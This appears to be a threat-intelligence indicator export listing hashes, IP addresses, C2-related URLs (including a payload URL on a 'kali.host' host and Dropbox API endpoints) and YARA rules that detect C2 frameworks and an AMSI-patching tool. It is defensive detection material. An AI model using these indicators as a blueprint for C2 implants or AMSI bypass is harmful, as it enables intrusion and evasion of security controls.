Details	sha256	1	f83bbf7318f982ddb457863cf2b45e13c402c2eff5bb1a4d5b8f074295ff46f9
Details	sha256	1	dba80b543f6d39f2d0631f6cfebef961259746e6f70fb0cf1431e85343ba7d32
Details	sha256	1	8b534d0f9f699d6a02aca559f2699d914b0b3f8749e0d206bece0fe09b92ccc6
Details	sha256	1	162fc5cdd4ed03ab16da5edd076bc05e87dae1a41b053dddbcc8cac06baa8a63
Details	sha256	1	ce0fe31e5c1fe918f766ab2e83daaac9e58cce3972c0872f8d1b2de03417528f
Details	sha256	1	720ded9560168b206152cceab0fcfa8138ad92311a0cf4b5bdf7ba0bd8074839
Details	sha256	1	11d05c91663798116f6426c24166bdd648c519f6f95bdff4659dd56c575e7978
Details	sha256	1	39391bffd11e6e525b02ea4cd5b3b4422c072126424b7031db346d260a4bd127
Details	sha256	1	019fa586cbbdc875e72e614ab1917a93bcbc14bb0fa1731d0643b93c3763db2a
Details	IPv4	1	192.168.17.131
Details	IPv4	1441	127.0.0.1
Details	IPv4	109	1.0.0.0
Details	IPv4	25	6.0.0.0
Details	IPv4	97	10.0.0.1
Details	IPv4	262	192.168.1.1
Details	IPv4	1	192.168.1.175
Details	Pdb	2	apphost.pdb
Details	Pdb	1	sharpc2.pdb
Details	Pdb	1	api.pdb
Details	Url	2	https://go.microsoft.com/fwlink/?linkid=798306
Details	Url	1	https://aka.ms/dotnet-core-applaunch?
Details	Url	3	https://graph.microsoft.com/.default
Details	Url	7	https://content.dropboxapi.com/2/files/download
Details	Url	8	https://content.dropboxapi.com/2/files/upload
Details	Url	1	https://api.dropboxapi.com/2/files/get_metadata
Details	Url	2	https://api.dropboxapi.com/2/files/list_folder
Details	Url	1	https://api.dropboxapi.com/2/files/move
Details	Url	3	https://api.dropboxapi.com/2/files/delete
Details	Url	3	http://schemas.microsoft.com/exchange/services/2006/messages
Details	Url	22	http://www.w3.org/2001/xmlschema
Details	Url	24	http://schemas.xmlsoap.org/soap/envelope
Details	Url	1	http://kali.host/mikec2.exe
Details	Url	1	http://127.0.0.1/test.exe
Details	Url	1	http://127.0.0.1/shellcode.bin
Details	Url	1	https://raw.githubusercontent.com/empireproject/empire/fcd1a3d32b4c37a392c59ffe241b9cb973fde7f4/lib
Details	Url	1	https://github.com/its-a-feature/mythic/blob/master/payload_types/apfell/agent_code/shell.js#l2
Details	Url	1	https://github.com/its-a-feature/mythic/blob/14b06e3755cea0f291ea6246fc315b9b30388640/payload_types/apfell/agent_c
Details	Url	1	https://github.com/its-a-feature/mythic/blob/master/payload_types/apfell/agent_code/base/apfell-jxa.js#l116
Details	Url	1	https://github.com/its-a-feature/mythic/blob/master/payload_types/apfell/agent_code/c2_profiles/http.js#l115
Details	Url	1	https://github.com/its-a-feature/mythic/blob/master/payload_types/apfell/agent_code/base/apfell-jxa.js#l9
Details	Url	1	https://github.com/its-a-feature/mythic/blob/master/payload_types/apfell/agent_code/base/apfell-jxa.js#l70
Details	Url	1	https://github.com/its-a-feature/mythic/blob/master/payload_types/apfell/agent_code/base/apfell-jxa.js#l2
Details	Url	1	https://github.com/its-a-feature/mythic/blob/master/payload_types/apfell/agent_code/base/apfell-jxa.js#l106
Details	Url	1	https://howto.thec2matrix.com
Details	Url	5	https://attack.mitre.org/tactics/ta0011
Details	Yara rule	1	import "hash" import "pe" rule AirStrike { meta: description = "AirStrike - AirStrike-x64.exe, AirStrike-x86.exe" sha256_1 = "be80b172b1e5fd000f5e638ebc8289b9940fa4ca51b75b0dd92ca633cbf1fcb9" sha256_2 = "582886d688fb0e3573afa5f39c7984a2fe99d2ffb50543d354d9286c44dbd1ad" strings: $s1 = "[-] Copied shellcode to memory" ascii fullword $s2 = "[-] Received shellcode of size %d" ascii fullword $s3 = "username=%s&pid=%d&machine=%s&domain=%s&arch=%s&process=%s&version=%s" ascii fullword $s4 = "[+] Killing process" ascii fullword $s5 = " <requestedExecutionLevel level='asInvoker' uiAccess='false' />" ascii fullword $s6 = "[-] Thread finished" ascii fullword $s7 = "[-] Created thread" ascii fullword $s8 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36" ascii fullword $s9 = "[-] Changed memory protection" ascii fullword $s10 = "[+] Request sent" ascii fullword $s11 = "[-] Received response of size %d" ascii fullword $s12 = "[+] Data: %s" ascii fullword $s13 = " <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">" ascii fullword $s14 = "X-Session-ID: %s" ascii fullword $s15 = "192.168.17.131" ascii fullword $s16 = ".rdata$voltmd" ascii fullword $s17 = " </trustInfo>" ascii fullword $s18 = "[-] Allocated memory at %p" ascii fullword $s19 = "_get_initial_narrow_environment" ascii fullword $s20 = "_set_app_type" ascii fullword condition: hash.sha256(0, filesize) == "be80b172b1e5fd000f5e638ebc8289b9940fa4ca51b75b0dd92ca633cbf1fcb9" or hash.sha256(0, filesize) == "582886d688fb0e3573afa5f39c7984a2fe99d2ffb50543d354d9286c44dbd1ad" or pe.imports("kernel32.dll", "VirtualProtect") and pe.imports("kernel32.dll", "TerminateProcess") and pe.imports("crypt32.dll", "CryptBinaryToStringW") and pe.imports("wininet.dll", "InternetConnectW") and ((uint16(0) == 0x5a4d and filesize < 40KB and (8 of them)) or (all of them)) }
Details	Yara rule	1	import "hash" import "pe" rule AlanFramework { meta: description = "AlanFramework - wqjs_x64.exe, wqjs_x86.exe" sha256_1 = "68a4cd4fcf1f9a0e3a68ac19621adcb214f830c0854f7a9ad18ce453174d31a0" sha256_2 = "f8675fea43f09741254d739ce072c0a73df9aa2e8abb670a4c94f2cda0315e03" strings: $s1 = "proxy: target property must be present in proxy ownKeys" ascii fullword $s2 = "AppPolicyGetProcessTerminationMethod" ascii fullword $s3 = "Storage error: %d - '%s'" ascii fullword $s4 = "proxy: inconsistent getOwnPropertyDescriptor" ascii fullword $s5 = "proxy: property not present in target were returned by non extensible proxy" ascii fullword $s6 = "new.target only allowed within functions" ascii fullword $s7 = "GetTempPath2W" ascii fullword $s8 = "expecting target" ascii fullword $s9 = "circular reference when looking for export '%s' in module '%s'" ascii fullword $s10 = "Failed to read file header" ascii fullword $s11 = "getOwnPropertyDescriptors" ascii fullword $s12 = "operator %s: no function defined" ascii fullword $s13 = "new.target" ascii fullword $s14 = "out of memory in regexp execution" ascii fullword $s15 = "getenviron" ascii fullword $s16 = "curl -s -i" ascii fullword $s17 = "Failed to write header to the disk" ascii fullword $s18 = "invalid import binding" ascii fullword $s19 = "invalid descriptor flags" ascii fullword $s20 = "RegExp exec method must return an object or null" ascii fullword condition: hash.sha256(0, filesize) == "68a4cd4fcf1f9a0e3a68ac19621adcb214f830c0854f7a9ad18ce453174d31a0" or hash.sha256(0, filesize) == "f8675fea43f09741254d739ce072c0a73df9aa2e8abb670a4c94f2cda0315e03" or pe.imports("kernel32.dll", "CreateProcessW") and pe.imports("kernel32.dll", "TerminateProcess") and pe.imports("kernel32.dll", "FindNextFileW") and pe.imports("kernel32.dll", "RemoveDirectoryW") and pe.imports("crypt32.dll", "CryptStringToBinaryA") and (uint16(0) == 0x5a4d and filesize < 3000KB and (8 of them)) or (all of them) }
Details	Yara rule	1	import "hash" rule AM0NEye_AmsiInject { meta: description = "AM0NEye - amsi-inject.o" sha256 = "c703ffb19774194cbdd674c3feb12ef9942a242ab6569a6e153ba846cf4de852" strings: $x1 = "Fail - Could not patch AMSI.AmsiOpenSession in remote process: PID:%d" ascii fullword $s2 = "Success - Patched AMSI.AmsiOpenSession in remote process: PID:%d" ascii fullword $s3 = "amsi.dll" ascii fullword $s4 = "Attempting to patch AMSI in remote process with PID: %d" ascii fullword $s5 = "__imp_KERNEL32$OpenProcess" ascii fullword $s6 = "__imp_KERNEL32$WriteProcessMemory" ascii fullword $s7 = "amsi-inject.c" ascii fullword $s8 = "__imp_KERNEL32$GetProcAddress" ascii fullword $s9 = "__imp_KERNEL32$CloseHandle" ascii fullword $s10 = "__imp_KERNEL32$LoadLibraryA" ascii fullword $s11 = "patchAmsiOpenSession" ascii fullword $s12 = "__imp_BeaconDataInt" ascii fullword $s13 = "AmsiOpenSession" ascii fullword $s14 = "GCC: (GNU) 10-win32 20220324" ascii fullword $s15 = "P@.xdata" ascii fullword condition: hash.sha256(0, filesize) == "c703ffb19774194cbdd674c3feb12ef9942a242ab6569a6e153ba846cf4de852" or uint16(0) == 0x8664 and filesize < 5KB and 1 of ($x*) and 4 of them }